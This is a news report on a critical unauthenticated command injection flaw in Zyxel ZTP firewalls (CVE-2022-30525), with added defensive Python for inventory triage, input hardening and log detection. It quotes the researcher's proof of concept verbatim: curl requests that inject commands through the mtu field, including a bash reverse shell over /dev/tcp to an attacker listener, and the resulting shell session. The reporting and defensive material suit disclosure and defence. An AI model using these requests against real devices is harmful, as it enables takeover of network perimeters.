Zyxel silently fixes command injection vulnerability with a severity rating of 9.8


Hardware maker Zyxel has quietly released an update that fixes a critical vulnerability that gives hackers the ability to remotely control tens of thousands of firewall devices.

The vulnerability, which allows remote command injection with no authentication required, carries a severity rating of 9.8 out of a possible 10. It is easy to exploit by sending simple HTTP or HTTPS requests to the affected devices. Those requests let attackers run commands or open a web shell that gives them persistent privileged access.

High value, easy to weaponize, requires no authentication

The vulnerability affects a range of firewalls that offer a feature known as zero-touch provisioning. Zyxel markets the devices for use in small branch and corporate office deployments. The devices provide VPN connectivity, SSL inspection, web filtering, intrusion protection and email security and deliver up to 5 Gbps throughput through the firewall. The Shodan device search service shows that more than 16,000 affected devices are exposed to the internet.

The specific devices affected are:

Applicable model                        Affected firmware version
USG FLEX 100, 100W, 200, 500, 700       ZLD5.00 to ZLD5.21 Patch 1
USG20-VPN, USG20W-VPN                   ZLD5.10 to ZLD5.21 Patch 1
ATP 100, 200, 500, 700, 800             ZLD5.10 to ZLD5.21 Patch 1
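A quick way to turn the table above into an inventory check, added here as an example (it is not Zyxel's or Rapid7's code). The affected ranges are exactly the ones in the table; the firmware version that fixes the flaw is deliberately not assumed, so a device above ZLD5.21 Patch 1 is reported as outside the listed affected range rather than as patched. The inventory at the bottom is constructed sample data, and the version parser accepts the article's "ZLD5.21 Patch 1" notation plus the "ZLD V5.21 Patch 1" and bare "5.21" forms.

```python
"""Triage a firewall inventory against the affected-version table for CVE-2022-30525.

Added example, not Zyxel's or Rapid7's code. Ranges come from the article's table;
the fixed version is not assumed, so anything above ZLD5.21 Patch 1 is reported as
"outside-affected-range", not "patched". The inventory below is constructed.
"""
import re
from typing import List, Optional, Tuple

Version = Tuple[int, int, int]  # (major, minor, patch): ZLD5.21 Patch 1 -> (5, 21, 1)

# Model family -> (lowest affected, highest affected), from the article's table.
AFFECTED_RANGES = {
    "USG FLEX":  ((5, 0, 0),  (5, 21, 1)),   # USG FLEX 100/100W/200/500/700
    "USG20-VPN": ((5, 10, 0), (5, 21, 1)),   # USG20-VPN, USG20W-VPN
    "ATP":       ((5, 10, 0), (5, 21, 1)),   # ATP 100/200/500/700/800
}

MODEL_PATTERNS = [
    (re.compile(r"^USG FLEX (100W?|200|500|700)$"), "USG FLEX"),
    (re.compile(r"^USG20W?-VPN$"), "USG20-VPN"),
    (re.compile(r"^ATP (100|200|500|700|800)$"), "ATP"),
]

# "ZLD5.21 Patch 1", "ZLD V5.21 Patch 1" or "5.21"; missing "Patch n" means patch 0.
VERSION_RE = re.compile(r"^(?:ZLD\s*)?V?(\d+)\.(\d+)(?:\s*Patch\s*(\d+))?$", re.IGNORECASE)


def parse_zld_version(text: str) -> Optional[Version]:
    m = VERSION_RE.match(text.strip())
    if not m:
        return None
    return (int(m.group(1)), int(m.group(2)), int(m.group(3) or 0))


def model_family(model: str) -> Optional[str]:
    for pattern, family in MODEL_PATTERNS:
        if pattern.match(model.strip()):
            return family
    return None


def assess(model: str, firmware: str) -> str:
    """'affected', 'outside-affected-range', 'model-not-listed' or 'unknown-version'."""
    family = model_family(model)
    if family is None:
        return "model-not-listed"
    version = parse_zld_version(firmware)
    if version is None:
        return "unknown-version"
    low, high = AFFECTED_RANGES[family]
    return "affected" if low <= version <= high else "outside-affected-range"


def triage(inventory: List[Tuple[str, str, str]]) -> List[Tuple[str, str]]:
    """(hostname, status) for every device that needs patching or a manual look."""
    results = [(host, assess(model, fw)) for host, model, fw in inventory]
    return [(host, status) for host, status in results if status != "outside-affected-range"]


# Constructed sample inventory: (hostname, model, firmware string as reported by the device).
SAMPLE_INVENTORY = [
    ("fw-branch-01", "USG FLEX 100", "ZLD5.21 Patch 1"),
    ("fw-branch-02", "USG FLEX 200", "ZLD5.00"),
    ("fw-hq-edge",   "ATP 200",      "ZLD5.00"),           # below the ATP range in the table
    ("fw-lab",       "USG20-VPN",    "ZLD V5.21 Patch 2"),  # above the listed range
    ("fw-remote",    "VPN 100",      "ZLD5.21 Patch 1"),    # VPN series is not in the table
    ("fw-old",       "ATP 800",      "unknown"),            # version string not parseable
]

if __name__ == "__main__":
    for host, status in triage(SAMPLE_INVENTORY):
        print(f"{host:14} {status}")
```

Devices reported as model-not-listed or unknown-version are not cleared; they are simply outside what the table can say and need a manual check against the vendor advisory.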

The vulnerability is tracked as CVE-2022-30525. Rapid7, the security company that discovered it and privately reported it to Zyxel, said the VPN series of devices also supports ZTP but is not vulnerable because it lacks the other features required. In an advisory published on Thursday, Rapid7 researcher Jake Baines wrote:

The affected models are vulnerable to unauthenticated and remote command injection via the administrative HTTP interface. Commands are executed as the nobody user. This vulnerability is exploited through the /ztp/cgi-bin/handler URI and is the result of passing unfiltered attacker input into the os.system method in lib_wan_settings.py. The vulnerable functionality is invoked in association with the setWanPortSt command. An attacker can inject arbitrary commands into the mtu or the data parameter.
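The defect Baines describes, request fields formatted into a string that is handed to os.system, shown beside a hardened version of the same step. This is an added example, not Zyxel's lib_wan_settings.py (which is not reproduced here): the tool path /usr/sbin/example_iface_tool, the argument order, the allowed proto values and the numeric bounds are illustrative assumptions, and the unsafe variant only builds the command string so that the effect of the injected mtu is visible without anything being executed.

```python
"""Unfiltered request input into a shell string, beside a hardened form of the same step.

Added example, not Zyxel's code. TOOL, the argument order, ALLOWED_PROTO and the numeric
bounds are assumptions made for illustration. build_unsafe_command() returns the string
the vulnerable pattern would pass to os.system instead of running it.
"""
import re
import subprocess
from typing import Dict, List

TOOL = "/usr/sbin/example_iface_tool"        # placeholder path, not a real Zyxel binary
ALLOWED_PROTO = {"dhcp", "static", "pppoe"}  # assumption: values the tool understands


def build_unsafe_command(req: Dict[str, str]) -> str:
    """Vulnerable pattern: client-controlled strings spliced into a /bin/sh command line.
    Anything the client puts in 'mtu' is parsed by the shell, not by the tool."""
    return f"{TOOL} {req['port']} {req['mtu']} {req['vlanid']} >/dev/null 2>&1"
    # os.system(<that string>) is the defect the advisory describes.


def _uint(value: str, field: str, low: int, high: int) -> int:
    # Only plain decimal digits are accepted; int() alone would also take '+5' or '1_500'.
    if not re.fullmatch(r"\d{1,5}", str(value)):
        raise ValueError(f"{field} must be a decimal integer, got {value!r}")
    n = int(value)
    if not low <= n <= high:
        raise ValueError(f"{field} out of range: {n}")
    return n


def build_safe_argv(req: Dict[str, str]) -> List[str]:
    """Hardened form: validate each field as the type it is meant to be and return an
    argv list, so no shell is ever involved in interpreting the values."""
    proto = req.get("proto", "")
    if proto not in ALLOWED_PROTO:
        raise ValueError(f"proto not allowed: {proto!r}")
    port = _uint(req.get("port", ""), "port", 0, 7)          # assumption: few fixed WAN ports
    mtu = _uint(req.get("mtu", ""), "mtu", 576, 9000)        # assumption: plausible MTU bounds
    vlanid = _uint(req.get("vlanid", ""), "vlanid", 1, 4094)
    if not re.fullmatch(r"[A-Za-z0-9_.-]{0,64}", req.get("data", "")):
        raise ValueError("data contains characters outside the allowed set")
    return [TOOL, str(port), str(mtu), str(vlanid)]


def is_rejected(req: Dict[str, str]) -> bool:
    """True if the hardened validator refuses the request."""
    try:
        build_safe_argv(req)
    except ValueError:
        return True
    return False


def apply_wan_settings(req: Dict[str, str], dry_run: bool = True) -> List[str]:
    """Validate, then invoke the tool with shell=False; dry_run only returns the argv."""
    argv = build_safe_argv(req)
    if not dry_run:
        subprocess.run(argv, check=True, shell=False,
                       stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)
    return argv


# Constructed requests: a normal one and one shaped like the advisory's ping example.
BENIGN_REQUEST = {"command": "setWanPortSt", "proto": "dhcp", "port": "4",
                  "vlan_tagged": "1", "vlanid": "5", "mtu": "1500", "data": "hi"}
INJECTED_REQUEST = dict(BENIGN_REQUEST, mtu="; ping 192.168.1.220;")

if __name__ == "__main__":
    print("unsafe string :", build_unsafe_command(INJECTED_REQUEST))
    print("safe argv     :", apply_wan_settings(BENIGN_REQUEST))
    print("injected req  :", "rejected" if is_rejected(INJECTED_REQUEST) else "accepted")
```

The unsafe string shows the same shape as the `sh -c` line in the process listing from the advisory: the tool's own arguments, then the injected command, then the remaining argument. In the hardened version the question of escaping never arises, because each field is converted to the integer or token it must be before it reaches an argv list.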

Here are examples of (1) a curl request that forces the firewall to run a ping to the IP address 192.168.1.220, followed by (2) the process listing (ps output) on the firewall showing the result, (3) a request that creates a reverse shell, and (4) what an attacker can do with that reverse shell:

    1. curl -v --insecure -X POST -H "Content-Type: application/json" -d
      '{"command":"setWanPortSt","proto":"dhcp","port":"4","vlan_tagged"
      :"1","vlanid":"5","mtu":"; ping 192.168.1.220;","data":"hi"}'
      https://192.168.1.1/ztp/cgi-bin/handler
      
    2. nobody   11040  0.0  0.2  21040  5152 ?        S    Apr10   0:00  _ /usr/local/apache/bin/httpd -f /usr/local/zyxel-gui/httpd.conf -k graceful -DSSL
      nobody   16052 56.4  0.6  18104 11224 ?        S    06:16   0:02  |   _ /usr/bin/python /usr/local/zyxel-gui/htdocs/ztp/cgi-bin/handler.py
      nobody   16055  0.0  0.0   3568  1492 ?        S    06:16   0:00  |       _ sh -c /usr/sbin/sdwan_iface_ipc 11 WAN3 4 ; ping 192.168.1.220; 5 >/dev/null 2>&1
      nobody   16057  0.0  0.0   2152   564 ?        S    06:16   0:00  |           _ ping 192.168.1.220
      
    3. curl -v --insecure -X POST -H "Content-Type: application/json" -d '
      {"command":"setWanPortSt","proto":"dhcp","port":"4","vlan_tagged":
      "1","vlanid":"5","mtu":"; bash -c "exec bash -i &>/dev/tcp/
      192.168.1.220/1270 <&1;";","data":"hi"}' https://192.168.1.1
      /ztp/cgi-bin/handler
      
    4. albinolobster@ubuntu:~$ nc -lvnp 1270
      Listening on 0.0.0.0 1270
      Connection received on 192.168.1.1 37882
      bash: cannot set terminal process group (11037): Inappropriate ioctl for device
      bash: no job control in this shell
      bash-5.1$ id
      id
      uid=99(nobody) gid=10003(shadowr) groups=99,10003(shadowr)
      bash-5.1$ uname -a
      uname -a
      Linux usgflex100 3.10.87-rt80-Cavium-Octeon #2 SMP Tue Mar 15 05:14:51 CST 2022 mips64 Cavium Octeon III V0.2 FPU V0.0 ROUTER7000_REF (CN7020p1.2-1200-AAP) GNU/Linux
      Bash-5.1
      
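A defender-side check over captured management-interface requests, added here as an example and not code from Rapid7 or Zyxel. It assumes a reverse proxy or WAF in front of the firewall's web interface that records method, path, client address, whether the request carried a valid admin session (the `authenticated` field is that assumption) and the JSON body; the records are constructed and modelled on the requests shown above. Because the handler needs no authentication, any POST to /ztp/cgi-bin/handler that did not come from an authenticated admin session is already worth a look, and a setWanPortSt body whose numeric fields contain shell metacharacters is the exploitation pattern itself.

```python
"""Flag CVE-2022-30525-style requests in captured HTTP request records.

Added example, not Zyxel's or Rapid7's code. Assumes a proxy/WAF log with method, path,
client, an 'authenticated' flag and the raw JSON body. RECORDS below are constructed.
"""
import json
import re
from typing import Dict, List

ZTP_HANDLER = "/ztp/cgi-bin/handler"           # URI named in the advisory
SHELL_META = re.compile(r"[;&|`$<>(){}\n]")     # characters /bin/sh treats specially
NUMERIC_FIELDS = ("mtu", "port", "vlanid")      # fields that should only ever be numbers


def analyse_record(rec: Dict) -> List[str]:
    """Return the reasons a request looks like exploitation; empty list means clean."""
    reasons: List[str] = []
    if rec.get("path") != ZTP_HANDLER:
        return reasons
    if rec.get("method", "").upper() == "POST" and not rec.get("authenticated", False):
        reasons.append("unauthenticated POST to ZTP handler")
    try:
        body = json.loads(rec.get("body") or "{}")
    except json.JSONDecodeError:
        reasons.append("unparseable JSON body sent to ZTP handler")
        return reasons
    if body.get("command") != "setWanPortSt":
        return reasons
    for field in NUMERIC_FIELDS + ("data",):
        value = str(body.get(field, ""))
        if SHELL_META.search(value):
            reasons.append(f"shell metacharacters in {field}: {value!r}")
        elif field in NUMERIC_FIELDS and value and not value.isdigit():
            reasons.append(f"non-numeric {field}: {value!r}")
    return reasons


def scan(records: List[Dict]) -> Dict[int, List[str]]:
    """Map record index -> reasons, for flagged records only."""
    flagged = {}
    for i, rec in enumerate(records):
        reasons = analyse_record(rec)
        if reasons:
            flagged[i] = reasons
    return flagged


# Constructed records (no real traffic). Record 1 mirrors the ping request shown above.
RECORDS = [
    {"client": "10.0.0.5", "method": "POST", "path": ZTP_HANDLER, "authenticated": True,
     "body": '{"command":"setWanPortSt","proto":"dhcp","port":"4","vlan_tagged":"1",'
             '"vlanid":"5","mtu":"1500","data":"hi"}'},
    {"client": "198.51.100.7", "method": "POST", "path": ZTP_HANDLER, "authenticated": False,
     "body": '{"command":"setWanPortSt","proto":"dhcp","port":"4","vlan_tagged":"1",'
             '"vlanid":"5","mtu":"; ping 192.168.1.220;","data":"hi"}'},
    {"client": "10.0.0.5", "method": "GET", "path": "/", "authenticated": False, "body": ""},
    {"client": "198.51.100.7", "method": "POST", "path": ZTP_HANDLER, "authenticated": False,
     "body": "{not json"},
]

if __name__ == "__main__":
    for index, reasons in scan(RECORDS).items():
        print(f"record {index} from {RECORDS[index]['client']}:")
        for reason in reasons:
            print("   -", reason)
```

The metacharacter test is deliberately broad: a legitimate setWanPortSt request carries digits in mtu, port and vlanid, so any non-digit there is a defect or an attack, and a false positive costs one look at the log line.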

Rapid7 has released a module for the Metasploit exploitation framework that automates the exploit process.

Baines said Rapid7 notified Zyxel of the vulnerability on April 13 and the two parties agreed on a coordinated disclosure, including the patch, on June 21. Unbeknownst to Rapid7, he went on to say, the hardware manufacturer released a firmware update on April 28 that quietly patched the vulnerability. Zyxel obtained the CVE number only on Tuesday, after Rapid7 asked about the silent patch, and published an advisory on Thursday.

According to AttackerKB, a resource on security vulnerabilities, CVE-2022-30525 is of great value to threat actors because it is easy to weaponize, requires no authentication, and can be exploited in the default configuration of vulnerable devices. Rapid7 representatives were unavailable to answer basic questions about the accuracy of this assessment.

Administrators must manually apply the patch unless they have changed the default settings to allow automatic updating. Early indications are that the patch has not been widely deployed, as a Shodan query for just one of the vulnerable firewalls, the ATP200, showed that only around 25% of exposed devices were running the latest firmware.

Vulnerabilities affecting firewalls can be particularly severe because they are located at the outer edge of networks where inbound and outbound traffic flows. Many firewalls can also read the data before it is encrypted. Administrators overseeing networks using these affected devices should investigate their exposure to this vulnerability as a priority and remediate accordingly.
